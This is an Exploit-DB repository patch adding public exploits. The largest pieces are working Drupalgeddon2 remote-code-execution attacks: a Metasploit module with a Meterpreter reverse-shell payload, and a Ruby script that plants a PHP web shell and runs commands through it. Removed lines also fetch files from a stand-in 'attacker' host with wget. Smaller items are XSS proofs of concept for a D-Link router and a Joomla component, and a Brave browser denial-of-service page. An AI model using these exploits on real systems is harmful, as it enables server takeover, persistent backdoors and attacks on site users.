From d0cba5625fd42cb2ea7939009255d01cd38e3c74 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Wed, 18 Apr 2018 05:01:47 +0000
Subject: [PATCH] DB: 2018-04-18

12 changes to exploits/shellcodes

Brave Browser < 0.13.0 -  'long alert() argument' Denial of Service
Brave Browser < 0.13.0 -  'window.close(self)' Denial of Service
AMD Plays.tv 1.27.5.0 - 'plays_service.exe' Arbitrary File Execution
Microsoft Window Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation
Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS17-017)
Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS16-039)
D-Link DIR-615 Wireless Router - Persistent Cross Site Scripting
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)

Drupal  < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)
Drupal  < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)

Drupal  < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution

Joomla! Component jDownloads 3.2.58 - Cross Site Scripting
---
 exploits/hardware/remote/44473.txt   |  21 +
 exploits/php/remote/44482.rb         | 102 ++++
 exploits/php/webapps/44448.py        |  19 +-
 exploits/php/webapps/44449.rb        | 139 +++++-
 exploits/php/webapps/44454.txt       |   2 +-
 exploits/php/webapps/44471.txt       |  36 ++
 exploits/windows/local/44474.txt     |  16 +
 exploits/windows/local/44475.txt     |  28 ++
 exploits/windows/local/44476.py      |  88 ++++
 exploits/windows_x86/local/44478.cpp | 558 ++++++++++++++++++++++
 exploits/windows_x86/local/44479.cpp | 666 +++++++++++++++++++++++++++
 exploits/windows_x86/local/44480.cpp | 663 ++++++++++++++++++++++++++
 files_exploits.csv                   |  13 +-
 13 files changed, 2325 insertions(+), 26 deletions(-)
 create mode 100644 exploits/hardware/remote/44473.txt
 create mode 100755 exploits/php/remote/44482.rb
 create mode 100644 exploits/php/webapps/44471.txt
 create mode 100644 exploits/windows/local/44474.txt
 create mode 100644 exploits/windows/local/44475.txt
 create mode 100755 exploits/windows/local/44476.py
 create mode 100644 exploits/windows_x86/local/44478.cpp
 create mode 100644 exploits/windows_x86/local/44479.cpp
 create mode 100644 exploits/windows_x86/local/44480.cpp

diff --git a/exploits/hardware/remote/44473.txt b/exploits/hardware/remote/44473.txt
new file mode 100644
index 000000000..ff5bd1948
--- /dev/null
+++ b/exploits/hardware/remote/44473.txt
@@ -0,0 +1,21 @@
+######################################################################################
+# Exploit Title: D-Link DIR-615 Wireless Router - Persistent Cross Site Scripting (XSS)
+# Date: 14.04.2018
+# Exploit Author: Sayan Chatterjee
+# Vendor Homepage: http://www.dlink.co.in
+# Hardware Link: http://www.dlink.co.in/products/?pid=678
+# Category: Hardware (Wi-fi Router)
+# Hardware Version: T1
+# Firmware Version: 20.07
+# Tested on: Windows 10
+# CVE: CVE-2018-10110
+#######################################################################################
+
+Reproduction Steps:
+------------------------------
+1. Go to your wi-fi router gateway [i.e: http://192.168.0.1]
+2. Go to –> “Maintenance” –> “Admin”
+3. Create a user with name alert_"HI"
+4. Refresh the page and you will be having “HI” popup
+
+#######################################################################################
\ No newline at end of file
diff --git a/exploits/php/remote/44482.rb b/exploits/php/remote/44482.rb
new file mode 100755
index 000000000..06591009a
--- /dev/null
+++ b/exploits/php/remote/44482.rb
@@ -0,0 +1,102 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+    Rank = ExcellentRanking
+  
+    include Msf::Exploit::Remote::HttpClient
+  
+    def initialize(info={})
+      super(update_info(info,
+        'Name'           => 'Drupalgeddon2',
+        'Description'    => %q{
+          CVE-2018-7600 / SA-CORE-2018-002
+          Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1
+          allows remote attackers to execute arbitrary code because of an issue affecting
+          multiple subsystems with default or common module configurations.
+
+          The module can load msf PHP arch payloads, using the php/base64 encoder.
+
+          The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'
+        },
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'Vitalii Rudnykh',      # initial PoC
+            'Hans Topo',            # further research and ruby port
+            'José Ignacio Rojo'     # further research and msf module
+          ],
+        'References'     =>
+          [
+            ['SA-CORE', '2018-002'],
+            ['CVE', '2018-7600'],
+          ],
+        'DefaultOptions'  =>
+        {
+          'encoder' => 'php/base64',
+          'payload' => 'php/meterpreter/reverse_tcp',
+        },
+        'Privileged'     => false,
+        'Platform'       => ['php'],
+        'Arch'           => [ARCH_PHP],
+        'Targets'        =>
+          [
+            ['User register form with exec', {}],
+          ],
+        'DisclosureDate' => 'Apr 15 2018',
+        'DefaultTarget'  => 0
+      ))
+  
+      register_options(
+        [
+          OptString.new('TARGETURI', [ true, "The target URI of the Drupal installation", '/']),
+        ])
+  
+      register_advanced_options(
+        [
+
+        ])
+    end
+  
+    def uri_path
+      normalize_uri(target_uri.path)
+    end
+
+    def exploit_user_register
+      data = Rex::MIME::Message.new
+      data.add_part("php -r '#{payload.encoded}'", nil, nil, 'form-data; name="mail[#markup]"')
+      data.add_part('markup', nil, nil, 'form-data; name="mail[#type]"')
+      data.add_part('user_register_form', nil, nil, 'form-data; name="form_id"')
+      data.add_part('1', nil, nil, 'form-data; name="_drupal_ajax"')
+      data.add_part('exec', nil, nil, 'form-data; name="mail[#post_render][]"')
+      post_data = data.to_s
+
+      # /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
+      send_request_cgi({
+        'method'   => 'POST',
+        'uri'      => "#{uri_path}user/register",
+        'ctype'    => "multipart/form-data; boundary=#{data.bound}",
+        'data'     => post_data,
+        'vars_get' => {
+          'element_parents' => 'account/mail/#value',
+          'ajax_form'       => '1',
+          '_wrapper_format' => 'drupal_ajax',
+        }
+      })
+    end
+  
+    ##
+    # Main
+    ##
+  
+    def exploit
+      case datastore['TARGET']
+      when 0
+        exploit_user_register
+      else
+        fail_with(Failure::BadConfig, "Invalid target selected.")
+      end
+    end
+  end
\ No newline at end of file
diff --git a/exploits/php/webapps/44448.py b/exploits/php/webapps/44448.py
index 392e2ba3a..e116a0af1 100755
--- a/exploits/php/webapps/44448.py
+++ b/exploits/php/webapps/44448.py
@@ -10,12 +10,23 @@ print ('# https://github.com/a2u/CVE-2018-7600')
 print ('################################################################')
 print ('Provided only for educational or information purposes\n')
 
-target = raw_input('Enter target url (example: https://domain.ltd/): ')
+target = input('Enter target url (example: https://domain.ltd/): ')
+
+# Add proxy support (eg. BURP to analyze HTTP(s) traffic)
+# set verify = False if your proxy certificate is self signed
+# remember to set proxies both for http and https
+# 
+# example:
+# proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
+# verify = False
+proxies = {}
+verify = True
 
 url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' 
-payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget http://attacker/hello.txt'}
+payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo ";-)" | tee hello.txt'}
 
-r = requests.post(url, data=payload)
-if r.status_code != 200:
+r = requests.post(url, proxies=proxies, data=payload, verify=verify)
+check = requests.get(target + 'hello.txt')
+if check.status_code != 200:
   sys.exit("Not exploitable")
 print ('\nCheck: '+target+'hello.txt')
\ No newline at end of file
diff --git a/exploits/php/webapps/44449.rb b/exploits/php/webapps/44449.rb
index 053f2ae56..b9a1bda11 100755
--- a/exploits/php/webapps/44449.rb
+++ b/exploits/php/webapps/44449.rb
@@ -1,41 +1,142 @@
-# EDB-Note. Have the contents of "shell" on http://attacker/shell.php
+#!/usr/bin/env ruby
+#
+# Hans Topo & g0tmi1k's ruby port of Drupalggedon2 exploit ~ https://github.com/dreadlocked/Drupalgeddon2/   (EDBID: 44449 ~ https://www.exploit-db.com/exploits/44449/)
+# Based on Vitalii Rudnykh exploit ~ https://github.com/a2u/CVE-2018-7600   (EDBID: 44448 ~ https://www.exploit-db.com/exploits/44448/)
+# Hans Topo ~ https://github.com/dreadlocked
+# g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k
+#
+# Drupal Advisory ~ https://www.drupal.org/sa-core-2018-002
+# Vulnerable Versions:
+#          < 7.58
+#    8.x   < 8.3.9
+#    8.4.x < 8.4.6   (TESTED)
+#    8.5.x < 8.5.1   (TESTED)
+#
+# WriteUp & Thx ~ https://research.checkpoint.com/uncovering-drupalgeddon-2/
+# REF phpinfo() ~ https://twitter.com/i_bo0om/status/984674893768921089                   (curl - user/register - mail - #post_render)
+# REF phpinfo() ~ https://twitter.com/RicterZ/status/984495201354854401                   (burp - user/<id>/edit [requires auth] - mail - #lazy_builder)
+# REF 2x RCE    ~ https://gist.github.com/g0tmi1k/7476eec3f32278adc07039c3e5473708        (curl - user/register - mail & timezone - #lazy_builder & #post_render)
+# REF RCE       ~ https://gist.github.com/AlbinoDrought/626c07ee96bae21cb174003c9c710384  (curl - user/register - mail - #post_render)
+# REF rev_nc    ~ https://gist.github.com/AlbinoDrought/2854ca1b2a9a4f33ca87581cf1e1fdd4  (curl - user/register - mail - #post_render)
+# Collection    ~ https://github.com/g0rx/CVE-2018-7600-Drupal-RCE
+#
+#
+# Drupal Version ~ https://example.com/CHANGELOG.txt
+#
 
+
+require 'base64'
+require 'json'
 require 'net/http'
+require 'openssl'
 
-# Hans Topo ruby port from Drupalggedon2 exploit.
-# Based on Vitalii Rudnykh exploit
 
+# Proxy information (nil to disable)
+proxy_addr = nil
+proxy_port = 8080
+
+
+# Quick how to use
+if ARGV.empty?
+  puts "Usage: ruby drupalggedon2.rb <target> <command>"
+  puts "       ruby drupalgeddon2.rb https://example.com whoami"
+  exit
+end
+
+# Read in values
 target = ARGV[0]
 command = ARGV[1]
 
-url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
 
-shell = "<?php system($_GET['cmd']); ?>"
+# Banner
+puts "[*] --==[::#Drupalggedon2::]==--"
+puts "-"*80
+
+
+# Check input for protocol
+if not target.start_with?('http')
+  target = "http://" + target
+end
+
+# Check input for the end
+if not target.end_with?('/')
+  target += "/"
+end
+
+
+# Payload
+#evil = 'uname -a'
+evil = '<?php system($_GET["c"]); ?>'
+evil = "echo " + Base64.encode64(evil).strip + " | base64 -d | tee s.php"
+
+
+# PHP function to use
+phpmethod = 'exec'
+
+
+# Feedback
+puts "[*] Target : " + target
+puts "[*] Command: " + command
+puts "[*] PHP cmd: " + phpmethod
+
+
+# Method #1 - timezone & lazy_builder - response is 500 & blind    (will need to disable target check for this to work!)
+#url = target + 'user/register%3Felement_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
+# Vulnerable Parameters: access_callback / lazy_builder  / pre_render/ post_render
+#payload = "form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=" + evil
+
+
+# Method #2 - mail & post_render - response is 200
+url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
+# Vulnerable Parameters: access_callback / lazy_builder  / pre_render/ post_render
+payload = "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=" + phpmethod + "&mail[a][#type]=markup&mail[a][#markup]=" + evil
 
-payload = 'mail%5B%23markup%5D%3Dwget%20http%3A%2F%2Fattacker%2Fshell.php%26mail%5B%23type%5D%3Dmarkup%26form_id%3Duser_register_form%26_drupal_ajax%3D1%26mail%5B%23post_render%5D%5B%5D%3Dexec'
 
 uri = URI(url)
+http = Net::HTTP.new(uri.host, uri.port, proxy_addr, proxy_port)
 
-http = Net::HTTP.new(uri.host,uri.port)
-
+# Use SSL/TLS if needed
 if uri.scheme == 'https'
-	http.use_ssl = true
-	http.verify_mode = OpenSSL::SSL::VERIFY_NONE
+  http.use_ssl = true
+  http.verify_mode = OpenSSL::SSL::VERIFY_NONE
 end
 
-req = Net::HTTP::Post.new(uri.path)
+# Make the request
+req = Net::HTTP::Post.new(uri.request_uri)
 req.body = payload
 
-response = http.request(req)
+# Feedback
+puts "[*] Payload: " + evil
+#puts "[*] Sending: " + payload
+puts "-"*80
 
-if response.code != "200"
-	puts "[*] Response: " + response.code
-	puts "[*] Target seems not to be exploitable"
-	exit
+
+# Check response
+response = http.request(req)
+if response.code == "200"
+  puts "[+] Target seems to be exploitable! w00hooOO!"
+  puts "[+] Result: " + JSON.pretty_generate(JSON[response.body] )
+else
+  puts "[!] Target does NOT seem to be exploitable ~ Response: " + response.code
+  #exit
 end
 
-puts "[*] Target seems to be exploitable."
 
-exploit_uri = URI(target+"/sh.php?cmd=#{command}")
+# Feedback
+puts "-"*80
+puts "[*]   curl '" + target + "s.php?c=#{command}'"
+puts "-"*80
+
+# Now run our command
+exploit_uri = URI(target + "s.php?c=#{command}")
+
+# Check response
 response = Net::HTTP.get_response(exploit_uri)
-puts response.body
\ No newline at end of file
+if response.code != "200"
+  puts "[!] Exploit FAILED ~ Response: " + response.code
+  exit
+end
+
+
+# Result
+puts "[+] Output: " + response.body
\ No newline at end of file
diff --git a/exploits/php/webapps/44454.txt b/exploits/php/webapps/44454.txt
index 2ad5b5578..065dd0f53 100644
--- a/exploits/php/webapps/44454.txt
+++ b/exploits/php/webapps/44454.txt
@@ -1,5 +1,5 @@
 # Exploit Title:  Cobub Razor 0.8.0 SQL injection Vulnerability
-# Date: 2018-04-14
+# Date: 2018-04-16
 # Exploit Author: Kyhvedn（yinfengwuyueyi@163.com、kyhvedn@5ecurity.cn）
 # Vendor Homepage: http://www.cobub.com/
 # Software Link: https://github.com/cobub/razor
diff --git a/exploits/php/webapps/44471.txt b/exploits/php/webapps/44471.txt
new file mode 100644
index 000000000..ce8890bd6
--- /dev/null
+++ b/exploits/php/webapps/44471.txt
@@ -0,0 +1,36 @@
+#######################################
+# Exploit Title: Joomla! Component jDownloads 3.2.58 - Cross Site Scripting
+# Google Dork: N/A
+# Date: 14-04-2018
+#######################################
+# Exploit Author: Sureshbabu Narvaneni#
+#######################################
+# Author Blog : http://nullnews.in
+# Vendor Homepage: http://www.jdownloads.com/
+# Software Link: http://www.jdownloads.com/index.php/downloads/category/6-jdownloads.html
+# Affected Version: 3.2.58
+# Category: WebApps
+# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
+# CVE : CVE-2018-10068
+#
+# 1. Vendor Description:
+#
+# Exclusive Download manager for Joomla!
+#
+# 2. Technical Description:
+#
+# Cross-site scripting (XSS) vulnerability in plupoad flash component in jDownloads before 3.2.59 allows remote attackers to inject arbitrary web script.
+#
+# 3. Proof Of Concept:
+#
+http://url/joomla/administrator/components/com_jdownloads/assets/plupload/js/Moxie.swf?target%g=alert&uid%g=nice
+#
+# 4. Solution:
+#
+# Upgrade to latest release.
+# https://extensions.joomla.org/extension/jdownloads/
+#
+# 5. Reference:
+# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10068
+# https://vel.joomla.org/resolved/2150-jdownloads-3-2-58-xss-cross-site-scripting
+#####################################
\ No newline at end of file
diff --git a/exploits/windows/local/44474.txt b/exploits/windows/local/44474.txt
new file mode 100644
index 000000000..b00cf02c7
--- /dev/null
+++ b/exploits/windows/local/44474.txt
@@ -0,0 +1,16 @@
+# Exploit Title:Brave Browser < 0.13.0 Denial of Service (resource consumption) via a long alert() argument.
+# Date: 2017-10-16
+# Exploit Author: Sahil Tikoo
+# Vendor Homepage: https://brave.com
+# Software Link: https://github.com/brave/browser-laptop
+# Version: 0.12.5
+# Tested on: Kali Linux,Ubuntu ,Windows OS
+# CVE : CVE-2017-18256
+
+
+#PoC
+<html>
+<script>
+alert('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA